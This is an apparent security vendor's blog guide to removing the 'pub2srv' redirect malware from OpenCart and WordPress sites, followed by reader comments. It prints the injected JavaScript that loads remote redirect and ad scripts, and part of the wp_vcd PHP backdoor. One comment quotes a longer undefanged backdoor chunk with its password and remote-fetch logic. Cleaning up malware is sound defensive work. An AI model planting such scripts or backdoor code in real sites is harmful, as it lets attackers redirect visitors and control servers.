911 Hack Removal

How to Remove pub2srv malware from your OpenCart or WordPress Website

Updated on: June 4, 2020

How to Remove pub2srv malware from your OpenCart or WordPress Website

We’ve been watching a specific malware infection targeting OpenCart & WordPress websites for several months. It’s commonly referred to as the pub2srv malware infection which redirects your website visitors to other malicious domains like

go.pub2srv[.]com

go.mobisla[.]com

go.oclaserver[.com]

deloton.com/afu.php?zoneid= site

Dolohen.com

Also, Google will suspend your Ads under Malicious links on your website. Few of them are

https://defpush.com/ntfc.php?p=1565632
https://deloplen.com/apu.php?zoneid=1558096
https://go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1
https://mobpushup.com/notice.php?p=1558098&interactive=1&pushup=1
https://wowreality.info/page.js?wm=gr
pub2srv Malware

Screenshot of WordPress user request help in the forum

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security Suite before it’s too late.

What is pub2srv malware? What are its symptoms?

It is a malware causing OpenCart & WordPress sites to redirect to spammy web pages. On mobile devices, a spam pop-up or notifications opens containing ads and phishing pages.

The pub2srv malware injects malicious JavaScript code in the source of the webpage causing the redirect/pop-ups. In the case of Opencart it is caused due to SQL injection vulnerabilities in the store, allowing the hacker to add the malicious code to the database. In the case of WordPress, hackers are able to modify the index.php or functions.php file to insert the payload.

Typical symptoms of this hack:

  1. Visitors of your website are redirected to spam websites with advertisements, porn, phishing pages. Check our detailed blog on Why your website is facing multiple redirections.
  2. Pop-ups on mobile devices prompting you to install apps
  3. Plugins relying on AJAX stop working (Example: TablePress, DataTables etc.)
  4. Blacklisted by Google or Ads suspended. Check our blog to get back your suspended Ads.
  5. Un-recognized JavaScript code in the source

Consequences of the Hack

Since the underlying cause of this malware is an SQL injection (SQLi) vulnerability, an attacker can:

  • Add, delete, edit or read content in the database
  • Read source code from files on the database server
  • Write files to the database server
  • Steal user records & passwords of your WordPress/Opencart website
  • Theft of transaction information in your OpenCart/WooCommerce stores
  • Perform SEO spam on your domain resulting in Google Webmasters blacklist

How to remove the pub2srv malware code from my website?

In OpenCart, the malware typically infects the database and places its code in the following database tables:

  1. oc_product_description table (Product Descriptions)
  2.  oc_category_description table (Category Descriptions)

Follow these steps to remove the malicious code from your OpenCart database:

  1. Preview the database tables using a tool like phpMyAdmin or Sequel Pro
  2. Open the ‘oc_category_description’ table and inspect the values in the ‘description’ column.
  3. You will see some JavaScript code snippet as shown below:
    
    <script type="text/javascript">//<![CDATA[ (function() { var configuration = { "token": "XXXXXXXXXXXXX", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; var script = document.createElement(''script''); script.async = true; script.src = ''//cdn.shorte[.st]/link-converter.min.js''; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != ''complete'' && rs != ''loaded'') return; shortestMonetization(configuration);}; var entry = document.getElementsByTagName(''script'')[0]; entry.parentNode.insertBefore(script, entry); })(); //]]></script><script data-cfasync=''false'' type=''text/javascript'' src=''//pXXXXX.clksit[e.com/]adServe/banners?tid=XXXXX_127XXX_7&tagid=2''></script><script type="text/javascript" src="//[go.pub2srv][.com/ap]u.php?zoneid=XXXXXX"></script><script async="async" type="text/javascript" src="//g[o.mobisl]a.co[m/notice.ph]p?p=XXXXXX&interactive=1&pushup=1"></script>
    
  4. Execute the following SQL code snippet after making the necessary replacements:
    
    UPDATE oc89gWs_category_description
    SET description = REPLACE (description, 'INSERT MALICIOUS CODE FROM PREVIOUS STEP', '');
    
  5. Repeat all the above step for the oc_product_description table

In WordPress, the malware is typically found in the WordPress files:

  1. index.php
  2. functions.php
  3. Database tables

Follow these steps to remove the malicious code from your WordPress server:

  1. Open the index.php file (public_html folder) & the wp-content/themes/NAME-OF-THEME/functions.php on your server
  2. Search for unfamiliar/gibberish/encrypted code in these files. You may find code similar to:
    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX'))
    	{
    	
    if ( ! function_exists( 'wp_temp_setup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    ?>
  3. If you find malicious code in either of these files, you should replace the file(s) from a last known good backup.
  4. Also, verify the tables in your database as mentioned in the steps for OpenCart above.
  5. Also, in wp-include directory: delete wp-vcd.php and class.wp.php files, in wp-include directory: open post.php and delete the first php tag added by Malware. Open the theme’s functions.php file and delete the above codes. (Suggested by one our readers Jaber in comments)
Wordpress Malware removal steps

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security Suite before it’s too late.

Steps to prevent a re-infection & Identify the cause

  1. Update your OpenCart/WordPress website to the latest version: To fix any known security issues in the CMS core
  2. Block SQL Injection attacks: Use a security plugin like Astra which actively detects and blocks SQL Injection (SQLi) attacks before they even reach your website.
  3. Change the username and password of admin accounts: So that hacker does not continue to have access to the website after malware cleanup
  4. Change database password: Such that hacker is unable to directly connect to the database
  5. Change Encryption keys: To prevent spoofing & other cryptographic attacks
  6. Restrict Admin area access to only whitelisted IP addresses: Such that only authorized administrators can access the backend admin area
  7. Uninstall unused plugins/extensions: If no longer maintained, they may contain security issues causing the hack in the first place
  8. Scan Server Logs (Access & Error): You may find unfamiliar or gibberish errors in the logs which may indicate the source & time of the hack

Get the ultimate WordPress security checklist with 300+ test parameters

Also, check our blog article on Favicon (.ico) Virus Backdoor in WordPress

About Astra Web Security

Astra is an end-to-end security solution for your CMS. You can protect yourself against 100+ attacks, bad bots, malware with just the click of a button. Our security experts provide 24×7 assistance in malware cleanups & securing your online business. Say Hi on the chat widget below, if you’d want professional help or want to know how we make sure your website is 100% clean and secure!

Don’t take our words for it. See it for yourself!

Peek inside Astra

Was this post helpful?

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France).At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and shared his knowledge at various forums & invited talks.
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

13 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback

[…] is an article to know more about the […]

Jaber Al Nahian
2 years ago

Hi, thanks! We fixed the malware! Check https://wordpress.org/support/topic/ad-malware-on-our-site-but-cant-remove/#post-9768983 . Both of our child theme’s and main theme’s functions.php file was modified and removed the following line from beginning: <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) { $div_code_name = "wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code5\.php/i', $file, $matcholddomain)) { $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if (!function_exists('theme_temp_setup')) { $path… Read more »

Shikhil Sharma
Admin
2 years ago

That’s great! Glad we could help 🙂

Jaber Al Nahian
2 years ago

Update:
The codes were reappearing again!!

What solved me is:

In wp-include directory, delete wp-vcd.php and class.wp.php files
In wp-include directory, open post.php and detele first php tag added by Malware.
Open to theme’s functions.php file, and delete the above codes.

Source: https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting

Jaber Al Nahian
2 years ago

Can you update your WordPress section guide according to this? People will get help and thankful.

Jun
Jun
2 years ago

Hi Jaber

I have the same issue, but I have three questions.

1. If I delete class.wp.php, WordPress crashes…
2. Could you also tell me what exactly you deleted in post.php, because I couldn’t find any difference compare to an original post.php file.
3. Did you fix anything in SQL?

Jun

Vitold
Vitold
1 year ago

thank you very much it helped!!!

mario
mario
2 years ago

Thank you Jaber, you are doing great job!
But..are you sure that problem will not apear again?
I have about 20 wp sites on the same hosting (banahosting) and they are all infected.
Dou you thing that problem could be hosting where hackers injecting Javascript into clients’ databases directly?
Source:
https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1/page/2/
Thank you!

Mtvv
Mtvv
2 years ago

Hi, thanks for help especially Jaber.
I have problem too and also i’ve deleted code parts many many times but still problem is going on.
What is the permanent solution?

vtoanstar
2 years ago

Thankyou!
UPDATE: in wp-include directory. delete class.wp.php and wp-tmp.php file

Dennis
Dennis
2 years ago

Thank you very much, thanks to your quality article I was able to remove all viruses from my sites, I am very happy now, onwards I will follow your blog. Congratulations!!!

Sean
Sean
1 year ago

Hi All
Thanks for the information on this especially Jabber very helpful.

You have to delete the wp-vcd & wp-temp ones first before you remove the code from functions (and child theme functions file).

I also did “reinstall” wordpress on wordpress dashboard to be safe. Let’s see how it goes.

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany